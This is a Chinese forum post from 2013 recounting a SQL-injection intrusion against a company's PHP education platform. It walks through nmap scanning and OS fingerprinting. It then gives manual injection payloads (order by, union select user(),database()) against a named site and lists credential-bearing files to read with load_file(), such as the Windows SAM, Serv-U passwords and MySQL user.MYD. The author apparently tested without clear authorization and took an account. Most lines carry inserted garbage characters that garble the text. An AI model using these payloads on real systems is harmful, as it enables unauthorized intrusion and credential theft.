找回密码
 立即注册
查看: 2936|回复: 0
打印 上一主题 下一主题

记一次Linux系统PHP注入入侵检测

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 22:23:32 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
题记:
# m3 ?# ^, q# o" A! x9 w: V- `一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……: U) Q( f3 O" Q+ ^' I% _
第一步:获取需要的信息; R) Y6 F& \' d( V+ p# j0 D' b
由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。
# i$ G7 U. L2 P3 s1 S注:以下为保护特用XXX代替敏感信息# Q3 L0 D; i5 X' T! x
顺手先PING了一下他们的域名:* O. C# b: D' f
ping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)
0 c) N4 \1 k4 m  b; z64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms
) l; w1 g, m3 v; M顺便了解一下TTL,学好基础知识才能一路顺风:: S7 D& a$ ?/ S+ U) V9 p/ I! H
TTL:(Time To Live ) 生存时间
* j: [- |- [, m6 ^" e指定数据包被路由器丢弃之前允许通过的网段数量。
, C; _8 H$ a+ h: B7 R! c# UTTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。
5 F  |/ _  f. U3 W* m使用PING时涉及到的 ICMP 报文类型
% U6 _, f! x7 w' a一个为ICMP请求回显(ICMP Echo Request): G+ x# ?. F- @( g1 u
一个为ICMP回显应答(ICMP Echo Reply)
7 ^- I- V: y1 W" V# C% |2 {# NTTL 字段值可以帮助我们识别操作系统类型。
" w# P; o: J  aUNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
( q1 `! ]9 Q- k0 }, N6 OCompaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
' l0 y+ [0 R* D1 h3 e# F微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128* J) N# d4 a8 x+ R2 ]0 S- o
微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32
' m4 M, j0 C, f2 f# I5 g当然,返回的TTL值是相同的
7 k+ \6 ~8 I$ m% I但有些情况下有所特殊, o8 C% n6 e' y$ k  q3 i
LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64
0 j9 r0 Y0 Z1 L  R% nFreeBSD 4.1, 4.0, 3.4;
; u, s% ]+ Q6 s* ESun Solaris 2.5.1, 2.6, 2.7, 2.8;
6 ]& O! }% e1 w4 z+ EOpenBSD 2.6, 2.7,
) f5 K2 D, u! o/ r' [! E7 uNetBSD1 V& @) i# |, U8 j1 J
HP UX 10.20. w+ x; `, j" n% U+ `
ICMP 回显应答的 TTL 字段值为 255# V. k3 i- y% N) k; s
Windows 95/98/98SE
4 i6 R0 P( T: }' Z! o$ qWindows ME
' x; U6 B% ^3 ]# F' u0 r8 }8 eICMP 回显应答的 TTL 字段值为 321 t/ m+ c5 g0 _
Windows NT4 WRKS/ l3 Z9 a, @5 q! g7 g9 n2 i6 R
Windows NT4 Server
8 I6 \; }9 b/ S- Y' ^3 r/ O. Y) LWindows 20007 g8 `/ _% c9 c6 A( I) ]
Windows XP
- E9 F0 F: L* nICMP 回显应答的 TTL 字段值为 1281 _0 [  p+ q9 n- J5 k! Z" ~
这样,我们就可以通过这种方法来辨别操作系统
4 I9 H, p8 p% C1 A  eTTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255
9 f2 N+ c; W  @+ b+ y: m& [- _用NMAP扫描一下:  g3 ^. f5 u! B$ Y) p
nmap -sT -O XXX.XXX.XXX.XXX
. x, |, J. u* l$ O* O2 j1 F如果没有装WinPcap则会弹出提示:  y8 W4 v, x. A, [
WARNING: Could not import all necessary WinPcap functions.  You may need to upgr
: j4 r) P  Q) Z3 u, H8 Nade to version 3.1 or higher from http://www.winpcap.org.  Resorting to connect(
) \0 P" l8 c+ }* E9 C- P. {) mode — Nmap may not function completely; ?. a$ e/ L: t$ U9 l& z8 Z
TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher5 d% N+ |8 Q! p2 @3 V% @, j3 F
and iphlpapi.dll be installed. You seem to be missing one or both of these.  Win- _. @/ h# M1 w7 F
pcap is available from http://www.winpcap.org.  iphlpapi.dll comes with Win98 an
- N2 i* C$ A$ }0 J# F7 _2 ?d later operating sytems and NT 4.0 with SP4 or greater.  For previous windows v
: q& @6 V8 e( {$ T% wersions, you may be able to take iphlpapi.dll from another system and place it i3 [. N, u9 P1 `" e
n your system32 dir (e.g. c:\windows\system32).2 R* ~, }, O- v) t! r. |( @
QUITTING!( a! H- S* N" R) f: `
到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe
8 T) I; \7 y" g9 F  G3 g+ j& ?安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:9 ]2 z6 G; n! T! ?
Interesting ports on XXX.XXX.XXX.XXX:2 N2 A: B+ _' D& i: L
Not shown: 986 closed ports1 s$ O( r7 }# {+ u  |  ^3 \$ ?
PORT     STATE    SERVICE) E+ @. X, }" ]" \
21/tcp   open     ftp
3 n" G# c7 X8 C- E5 `22/tcp   open     ssh
% r+ [- h% X$ m) `23/tcp   open     telnet
, J2 I' S: k% B9 `9 ?8 [2 n80/tcp   open     http
( X5 \+ D/ G5 ~- z2 P; E* a: x  c111/tcp  open     rpcbind7 V: O  c4 }# |! l' x5 c+ I/ {
135/tcp  filtered msrpc. Q  U" Y5 }( e
139/tcp  filtered netbios-ssn
' Q" r: `: M6 x  ~' z# V1 M: t! ]445/tcp  filtered microsoft-ds
, ]! U$ ]5 x2 o& A4 d0 |513/tcp  open     login' m8 D0 R* K/ q; x$ P* _0 t
514/tcp  open     shell2 z+ `- j9 x+ T) T) p
593/tcp  filtered http-rpc-epmap8 s1 Q, X+ g; S
1720/tcp filtered H.323/Q.931  d1 T$ m( p" t
3306/tcp open     mysql. q8 N" L. M3 l3 v
4444/tcp filtered krb524$ }1 ]' j3 y0 C9 K0 ~. ]
Device type: WAP5 J1 y4 ?  L6 {' |4 u
Running: Linux 2.4.X
4 M4 o9 z( [) {! T* AOS details: DD-WRT (Linux 2.4.35s)& B4 L; b/ f/ X8 w% Z3 g
Network Distance: 13 hops
  `$ P" C, Q2 f: L! G, p3 i看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
0 t' [9 |6 h% M: w7 Q$ \. N7 ]1 h. Ulogin as:
/ o/ e% p7 {- x! Y* u2 mTelnet23端口也是开着的,用telnet 命令链接一下:: S2 w/ v2 J0 S1 T4 A
telnet XXX.XXX.XXX.XXX5 G& Q9 Z- I, o6 x0 a( X
提示:
" B6 ]( p/ G2 T" MRed Hat Enterprise Linux Server release 5.2 (Tikanga)
2 b' a2 i9 F7 cKernel 2.6.18-92.el5PAE on an i686
* F5 C3 Y' s4 ?) z# i1 Clogin:5 x$ p. s5 t5 o, W& d, `$ q
获取HTTP头信息:- P' i6 q: r) z4 j. T" ~
在本地执行如下PHP代码
; L: X* }7 p* q/ {6 p<?php7 q: |( d3 A8 [% d
$url = ‘XXX.XXX.XXX.XXX’;* w, x1 \5 @. t: u* l0 P& P
print_r(get_headers($url));
5 |& B& R) u6 ?print_r(get_headers($url, 1));9 \6 b' l9 h$ T* L: C6 h$ W2 ?; m) m
?>
& S0 r2 ]3 M9 e: ]& O8 M将以上代码保存为PHP文件,执行:) O; \6 K. ?8 y9 H- P
Array ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )
' X' ~$ e0 B& [) C0 {) \/ `现在可以得出结论:
6 V& U  j- ]( W5 [3 |系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)
, b8 S1 ~2 _* W9 {, M0 G+ M. `内核版本:Kernel 2.6.18-92.el5PAE on an i6869 n7 d  J  u; A7 U% L% l8 r
WEB服务器版本:nginx/0.7.619 q6 Q  r+ G. d4 T/ \6 y
第二步,开始测试寻找漏洞
. e! B$ O8 N6 X, L5 r- v  d3 K, Z分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。& T* R; O2 W, d# s' Q( k
1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的" ]7 {# U+ |/ Z1 ~- \! ^4 T1 C
2、测试方法:在地址后加 and 1=1 和 and 1=2 测试
/ u$ x- n2 b' M! i# R  |2 P" p. U4 \# vhttp://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常9 b1 x3 m: g* a7 L% w% m
http://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误/ M# D6 z" G! e4 A/ a3 f3 ~' m  q
恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续
" g4 k) C# {' F2 _3、手工注入:
+ T& j" y( R$ w( C" ]2 o注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。
1 S3 N) V+ I7 s* W8 n3.1 猜测当前表字段数
8 x& [. \$ i$ D" L$ e; ehttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10
  C) T, K! B2 |5 q此处猜测有个简单的算法,都是有技巧的吗,呵呵
6 J9 H3 Q! Z( ~: P+ `2 T算法简单如下:
2 M- z" C, P; j6 x第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;4 G3 Q8 O" n* N* a0 D! i
第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;
+ R& D  [5 p. Q  W5 Y+ r需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。
/ h+ t+ L0 Y0 O7 l  r! v4 M. f5 C以此来判断,是否过界,配合取中算法猜出字段数。* ~8 k3 i+ n, v  ]5 L
举例:! s( I7 E& B, t9 p  G7 D
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常
1 R: _, Z* V! e( `- Shttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误
" n; k6 Q  J3 T6 _此时3则为我们要找的字段数。
! Z( F2 |8 O+ X9 b, b3.2 配合union联合查询字段在页面所位置# u3 a1 f0 B' j& Z2 M) l% z! Y
我们已经知道了字段数为3,此时则可以做如下操作:  [& q: K! P$ L
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,3
. ^; R! Z2 D+ |: ~
2 m0 [) O. W8 w! a& k这样就可以测试到哪些字段在页面上有所显示了,如图:$ C, O5 [- w: [& U3 C1 v, M

0 C/ l1 x+ ]* f3.3 查敏感信息
% \2 j7 @( _/ e" |这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。
  a( R5 M! A- T6 U7 |2 o5 ~  G1 Shttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()
7 E& l( f6 P# m8 x2 Z: l3.3.1 先查数据库用户、数据库名,以备后用,如图:3 m! L* H/ P) K4 {& A2 T9 v* X6 ^

$ j5 R% _( G# b" [. X* S' |" M  o得到数据库用户为root、数据库名为DBxx;
* e' `+ P1 W  E$ e5 e( t: }. q3.3.2 查配置文件9 y8 v4 K) a2 v- ^, C2 x
查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。
* N& T0 Y( Y0 l8 D1 a* |7 s. a" m. D查看文件有一定的条件限制:% c0 w5 |5 F7 H
欲读取文件必须在服务器上
1 h2 [, v7 T- w; k% o) {1 s! {% J必须指定文件完整的路径
( w- H# z: b" `8 f: H# j. V( P' S必须有权限读取并且文件必须完全可读( p0 h- m+ |" @( ~0 i) i6 S
欲读取文件必须小于 max_allowed_packet" O7 ]4 b7 T- o
MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。7 |7 K, r3 w" E# u
常用的一些:
' E) b) b- V8 R4 W, _4 U7 c. Y/ _/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
; v, ]2 }  P2 X; }9 Y/usr/local/apache2/conf/httpd.conf1 ]3 D  @. l/ B! w1 |0 P
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置' c, P' A& o! t! Z# G
/usr/local/app/php5/lib/php.ini //PHP相关设置
. K% x; c- y: J* d- e4 k( q/etc/sysconfig/iptables //从中得到防火墙规则策略
) ?- E' F' I+ I7 e0 Y  v/etc/httpd/conf/httpd.conf // apache配置文件
$ Z) n6 c! U7 R2 S, B, Z/etc/rsyncd.conf //同步程序配置文件
- M) x# |) H* Q$ a( K/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.$ c: M3 U3 j4 @! a9 h: e# u+ {$ `
/etc/my.cnf //mysql的配置文件
  F9 `  K& A6 q/ _/etc/redhat-release //系统版本
: Q  |/ R' @9 a& n: I* o/etc/issue
4 Q. R6 p2 I5 O5 W5 p/etc/issue.net8 m/ A6 G, j# ]& t1 l
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码3 c# `# u" x7 A; E' j
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码8 f% _# B9 b8 p- G- P/ I9 g- {+ B
c:\Program Files\Serv-U\ServUDaemon.ini
# U3 ~0 e  k5 z+ ic:\windows\my.ini //MYSQL配置文件( }2 o5 |0 d: ?5 h0 ^" [
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件  n) Y) I3 C+ e' U
等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,
4 F' L3 r0 e6 h. q; d2 i1 {c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码% W  o& V4 h) z% L) ]% n
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此, p# `' ~9 w9 O7 E6 o+ k! M
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
$ q$ {, G2 M* n& G4 UC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件0 C( P+ G; F1 h5 s* \2 q( I9 `0 e- ?( a
//存储了pcAnywhere的登陆密码. }/ E! j  [& X5 d0 ~) {' d
由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。6 A- V- O/ \4 ]' B5 m7 X
这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。
0 M& i) y0 ^5 k6 d" x7 W最后:防范措施
2 u; F8 U, U5 `" X7 u1、修复PHP注入漏洞;
4 c3 ]$ F6 ^" `& f9 N1 b2、Mysql使用普通权限的用户;
. q( ?/ s9 k  N; h, z- ~3、升级linux内核至最新版本;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表